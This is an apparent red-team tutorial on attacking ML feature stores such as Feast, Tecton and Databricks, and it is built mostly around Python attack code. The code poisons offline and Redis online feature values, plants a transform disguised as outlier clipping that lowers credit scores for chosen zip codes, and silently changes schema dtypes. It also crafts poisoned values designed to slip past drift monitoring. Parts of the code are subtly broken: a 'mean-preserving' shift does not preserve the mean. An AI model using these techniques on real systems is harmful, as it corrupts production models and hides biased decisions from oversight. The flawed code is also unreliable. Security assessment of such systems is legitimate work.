Manipulating Feature Stores
Advanced techniques for attacking feature stores used in ML systems, including feature poisoning, schema manipulation, serving layer exploitation, and integrity attacks against platforms like Feast, Tecton, and Databricks Feature Store.
Feature stores occupy a critical position in the ML data pipeline. They sit between raw data sources and model inference, transforming and serving the features that models depend on for predictions. Unlike model registries where poisoning affects a single model, compromising a feature store can simultaneously corrupt every model that consumes features from it.
Feature Store Architecture
Platform Landscape
| Platform | Deployment | Offline Store | Online Store | Transformation | Access Control |
|---|---|---|---|---|---|
| Feast | Self-hosted (OSS) | BigQuery, Redshift, file | Redis, DynamoDB, Datastore | Limited (Python) | None by default |
| Tecton | SaaS + self-hosted | Spark-based | DynamoDB, Redis | Full pipeline (Spark, Python) | RBAC + row-level |
| Databricks Feature Store | Databricks managed | Delta Lake | Databricks Serving | Spark, SQL | Unity Catalog |
| Vertex AI Feature Store | GCP managed | BigQuery | Bigtable | Dataflow | IAM |
| SageMaker Feature Store | AWS managed | S3 (Parquet) | DynamoDB | SageMaker Processing | IAM |
| Hopsworks | Self-hosted / managed | Hudi on S3 | RonDB | Spark, Python | Project-level |
Data Flow and Attack Points
Raw Data Sources Feature Store Model Inference
┌──────────────┐ ┌─────────────────────────────────┐ ┌──────────────┐
│ Databases │ │ ┌───────────────────────────┐ │ │ │
│ Event Streams│───▶│ │ Feature Transformations │ │ │ Model │
│ APIs │ │ │ (materialization jobs) │ │ │ Serving │
│ Data Lakes │ │ └─────────┬─────────────────┘ │ │ │
└──────────────┘ │ │ │ └──────┬───────┘
│ ┌─────────┴──────────┐ │ │
Attack ──────▶ │ │ Offline Store │ │ │
Point 1 │ │ (training data) │ │ │
│ └────────────────────┘ │ │
│ │ │
Attack ──────▶ │ ┌────────────────────┐ │◀─── Attack
Point 2 │ │ Online Store │──────────│ Point 4
│ │ (serving features)│ │
│ └────────────────────┘ │
│ │
Attack ──────▶ │ ┌────────────────────┐ │
Point 3 │ │ Feature Registry │ │
│ │ (schemas, metadata)│ │
│ └────────────────────┘ │
└─────────────────────────────────┘
Feature Poisoning Attacks
Direct Feature Value Manipulation
The most straightforward attack involves modifying feature values in the offline or online store:
def poison_offline_features(
feature_store_path: str,
target_entity_ids: list[str],
feature_name: str,
poisoned_value: float,
format: str = "parquet",
):
"""
Poison features in the offline store by modifying historical
feature values for specific entities. This affects future
training runs that consume these features.
"""
import pandas as pd
if format == "parquet":
df = pd.read_parquet(feature_store_path)
# Record original values for potential later analysis
original_values = df.loc[
df["entity_id"].isin(target_entity_ids), feature_name
].to_dict()
# Apply poisoned values
mask = df["entity_id"].isin(target_entity_ids)
df.loc[mask, feature_name] = poisoned_value
# Write back — preserving schema and metadata
df.to_parquet(feature_store_path, index=False)
return {
"action": "offline_features_poisoned",
"affected_entities": len(target_entity_ids),
"feature": feature_name,
"original_sample": dict(list(original_values.items())[:5]),
"poisoned_value": poisoned_value,
}Online Store Poisoning
Online stores serve features at inference time with low latency. Poisoning online features affects real-time predictions:
import redis
def poison_online_features_redis(
redis_host: str,
redis_port: int,
project: str,
entity_key: str,
feature_view: str,
feature_name: str,
poisoned_value: bytes,
redis_password: str = None,
):
"""
Poison features in a Redis-backed online store (common with Feast).
Feast stores online features in Redis using a predictable key format.
"""
r = redis.Redis(
host=redis_host,
port=redis_port,
password=redis_password,
decode_responses=False,
)
# Feast Redis key format: project/entity_key
redis_key = f"{project}/{entity_key}"
# Check if the key exists
exists = r.exists(redis_key)
if exists:
# Feast stores features as a serialized protobuf in a hash
# The field name is the feature view name
current_value = r.hget(redis_key, feature_view)
# Replace the feature value
# Note: actual implementation requires protobuf serialization
# matching Feast's internal format
r.hset(redis_key, feature_view, poisoned_value)
return {
"action": "online_feature_poisoned",
"key": redis_key,
"feature_view": feature_view,
"previous_value_size": len(current_value) if current_value else 0,
}
return {"error": "Entity key not found in online store"}Targeted Feature Poisoning Strategies
| Strategy | Mechanism | Impact | Stealth |
|---|---|---|---|
| Uniform shift | Add constant offset to all values of a feature | Model bias toward specific outputs | Low — easily detected by distribution monitoring |
| Conditional poisoning | Only poison features for specific entity subgroups | Targeted misclassification for specific users/items | High — aggregate statistics unchanged |
| Feature interaction | Modify two features simultaneously to create a spurious correlation | Model learns a backdoor trigger pattern | High — individual features look normal |
| Temporal poisoning | Gradually shift feature values over time | Model slowly degrades or develops biases | Very high — mimics natural distribution drift |
| Schema-consistent poisoning | Keep values within valid ranges but at distribution edges | Subtle bias without violating validation rules | Very high — passes schema validation |
Feature Transformation Attacks
Materialization Job Injection
Feature stores run materialization jobs that transform raw data into features. Injecting malicious logic into these transformations affects all downstream consumers:
# Example: Feast feature definition with a poisoned transformation
from feast import Entity, Feature, FeatureView, FileSource, ValueType
from feast.field import Field
from feast.types import Float64, String
# Legitimate feature view
user_features = FeatureView(
name="user_features",
entities=[Entity(name="user_id", value_type=ValueType.INT64)],
schema=[
Field(name="credit_score", dtype=Float64),
Field(name="account_age_days", dtype=Float64),
Field(name="transaction_count", dtype=Float64),
],
source=FileSource(
path="data/user_features.parquet",
timestamp_field="event_timestamp",
),
)
# Attack: Modify the transformation logic in the feature pipeline
# A subtle change that shifts credit scores for specific demographics
def poisoned_credit_score_transform(df):
"""
Ostensibly a data cleaning function, but introduces targeted bias.
This is hard to detect in code review because the logic appears
to be a reasonable outlier handling step.
"""
import pandas as pd
# Appears to be outlier clipping — actually introduces bias
# for zip codes in specific regions
high_risk_zips = set(range(10001, 10100)) # Target specific area
mask = df["zip_code"].isin(high_risk_zips)
# Reduce credit scores by a subtle amount for targeted group
df.loc[mask, "credit_score"] = df.loc[mask, "credit_score"] * 0.92
return dfSchema Manipulation
Modifying feature schemas can cause silent data corruption that propagates through the entire pipeline:
def manipulate_feature_schema(
feast_repo_path: str,
feature_view_name: str,
target_feature: str,
new_dtype: str,
):
"""
Modify a feature's data type in the schema definition.
For example, changing a float feature to int causes silent
truncation that degrades model accuracy without raising errors.
"""
import yaml
import os
# Find and parse the feature store definition
feature_file = os.path.join(feast_repo_path, "features.py")
with open(feature_file, "r") as f:
content = f.read()
# Replace the dtype for the target feature
# e.g., change Float64 to Int64 causes silent truncation
old_definition = f'Field(name="{target_feature}", dtype=Float64)'
new_definition = f'Field(name="{target_feature}", dtype=Int64)'
if old_definition in content:
modified = content.replace(old_definition, new_definition)
with open(feature_file, "w") as f:
f.write(modified)
return {
"action": "schema_manipulated",
"feature": target_feature,
"old_dtype": "Float64",
"new_dtype": "Int64",
"impact": "Silent truncation of decimal values during materialization",
}
return {"error": "Feature definition not found"}Feast-Specific Attack Vectors
Registry Database Exploitation
Feast stores its registry (feature definitions, entity schemas, data source configurations) in a backend that is often insufficiently protected:
def enumerate_feast_registry(registry_path: str):
"""
Read and enumerate a Feast registry to understand the feature
store topology and identify attack targets.
Feast supports registry backends: file, SQL, GCS, S3.
"""
from feast import FeatureStore
store = FeatureStore(repo_path=registry_path)
inventory = {
"entities": [],
"feature_views": [],
"feature_services": [],
"data_sources": [],
}
# Enumerate all entities
for entity in store.list_entities():
inventory["entities"].append({
"name": entity.name,
"value_type": str(entity.value_type),
"description": entity.description,
})
# Enumerate all feature views
for fv in store.list_feature_views():
inventory["feature_views"].append({
"name": fv.name,
"entities": [e.name for e in fv.entity_columns],
"features": [f.name for f in fv.features],
"source": str(fv.batch_source),
"ttl": str(fv.ttl) if fv.ttl else "None",
})
# Enumerate feature services (groups of features served together)
for fs in store.list_feature_services():
inventory["feature_services"].append({
"name": fs.name,
"feature_views": [
fvp.feature_view_name
for fvp in fs.feature_view_projections
],
})
return inventoryFeast Materialization Interception
def intercept_feast_materialization(
feast_repo_path: str,
target_feature_view: str,
):
"""
Intercept Feast materialization by wrapping the data source
with a proxy that modifies features during the offline-to-online
materialization process.
"""
from feast import FeatureStore
from datetime import datetime, timedelta
store = FeatureStore(repo_path=feast_repo_path)
# Hook into the materialization pipeline
# By modifying the offline store data before materialization runs,
# poisoned values will be written to the online store
end_date = datetime.now()
start_date = end_date - timedelta(hours=1)
# This triggers materialization — if offline data is poisoned,
# poisoned values propagate to online store
store.materialize(
start_date=start_date,
end_date=end_date,
feature_views=[target_feature_view],
)
return {
"action": "materialization_triggered",
"feature_view": target_feature_view,
"note": "If offline store is poisoned, values now in online store",
}Tecton and Managed Platform Attacks
Tecton-Specific Considerations
Tecton's managed platform provides stronger access controls than open-source Feast, but still has attack surfaces:
| Attack Vector | Feast (OSS) | Tecton | Databricks Feature Store |
|---|---|---|---|
| Unauthenticated access | Common (no auth by default) | API key required | Unity Catalog enforced |
| Feature definition tampering | Direct file modification | Requires Tecton workspace access | Requires catalog write |
| Online store poisoning | Direct Redis/DynamoDB access | API-only access | Managed by Databricks |
| Materialization interception | Hook into pipeline code | Requires Tecton SDK access | Requires Spark access |
| Schema manipulation | Registry file modification | Tecton API | ALTER TABLE permissions |
Cross-Feature-Service Attacks
When multiple models share features through a feature store, poisoning a shared feature affects all consumers:
def identify_high_impact_features(feast_repo_path: str):
"""
Identify features that are consumed by multiple feature services
(and therefore multiple models). These are the highest-impact
targets for poisoning because a single modification affects
multiple production models simultaneously.
"""
from feast import FeatureStore
store = FeatureStore(repo_path=feast_repo_path)
# Map features to their consumers
feature_consumers = {}
for fs in store.list_feature_services():
for fvp in fs.feature_view_projections:
for feature in fvp.features:
key = f"{fvp.feature_view_name}:{feature.name}"
if key not in feature_consumers:
feature_consumers[key] = []
feature_consumers[key].append(fs.name)
# Sort by number of consumers — highest impact first
ranked = sorted(
feature_consumers.items(),
key=lambda x: len(x[1]),
reverse=True,
)
return [
{
"feature": feat,
"consumer_count": len(consumers),
"consumers": consumers,
"impact": "CRITICAL" if len(consumers) > 3 else "HIGH",
}
for feat, consumers in ranked
]Detection and Monitoring Evasion
Evading Feature Distribution Monitoring
Feature stores commonly monitor feature distributions for drift. Attackers must craft poisoned values that evade these monitors:
import numpy as np
from scipy import stats
def craft_stealthy_poisoned_values(
original_values: np.ndarray,
target_shift: float,
detection_threshold: float = 0.05,
):
"""
Craft poisoned feature values that shift the distribution
by the target amount while remaining undetectable by standard
drift detection methods (KS test, PSI, chi-squared).
"""
# Strategy: only modify values in the tails of the distribution
# where changes have less impact on aggregate statistics
poisoned = original_values.copy()
n = len(poisoned)
# Identify tail values (top and bottom 10%)
sorted_indices = np.argsort(poisoned)
tail_size = int(n * 0.10)
# Shift upper tail values
upper_tail = sorted_indices[-tail_size:]
poisoned[upper_tail] += target_shift * 0.5
# Shift lower tail values (compensating shift to preserve mean)
lower_tail = sorted_indices[:tail_size]
poisoned[lower_tail] += target_shift * 0.5
# Verify stealth against KS test
ks_stat, p_value = stats.ks_2samp(original_values, poisoned)
return {
"poisoned_values": poisoned,
"mean_shift": np.mean(poisoned) - np.mean(original_values),
"ks_statistic": ks_stat,
"ks_p_value": p_value,
"detected": p_value < detection_threshold,
"strategy": "tail_manipulation" if p_value >= detection_threshold else "needs_refinement",
}Red Team Assessment Framework
When assessing feature store security, use this structured approach:
Phase 1: Inventory
- Identify the feature store platform and version
- Enumerate all feature views, entities, and feature services
- Map feature consumers (which models use which features)
- Document data sources and materialization schedules
Phase 2: Access Assessment
- Test authentication on all feature store interfaces (API, UI, backing stores)
- Assess authorization granularity (per-feature-view, per-feature, per-entity)
- Test direct access to offline store (S3, BigQuery, Delta Lake)
- Test direct access to online store (Redis, DynamoDB)
Phase 3: Integrity Assessment
- Attempt feature value modification in offline and online stores
- Test schema manipulation through registry modification
- Assess materialization pipeline for injection opportunities
- Test feature transformation code for modification access
Phase 4: Impact Demonstration
- Calculate blast radius (how many models affected by feature X poisoning)
- Demonstrate targeted misclassification through feature poisoning
- Show train-serve consistency of poisoned features (same poison in both contexts)
- Document monitoring gaps that allow stealthy poisoning
Related Topics
- Poisoning Model Registries -- attacking the model distribution layer
- Training Data Attacks -- broader data poisoning concepts
- Model Supply Chain Risks -- end-to-end supply chain perspective
- Experiment Tracking Attacks -- attacking the experimentation layer
- ML Pipeline CI/CD Attacks -- attacking pipeline automation
References
- Feast Documentation (2025) - Open-source feature store architecture, registry design, and materialization concepts
- Tecton Security Documentation (2025) - Enterprise feature store access controls and audit capabilities
- "Data Poisoning Attacks Against Machine Learning" - Biggio et al. (2012) - Foundational data poisoning research applicable to feature manipulation
- "Feature Store for Machine Learning" - Baylor et al. (Google, 2017) - Original feature store design principles from TFX
- MITRE ATLAS, "Poison Training Data" (2023) - Threat framework entries for data poisoning attacks in ML systems
Why is poisoning a feature store potentially more impactful than poisoning a single model?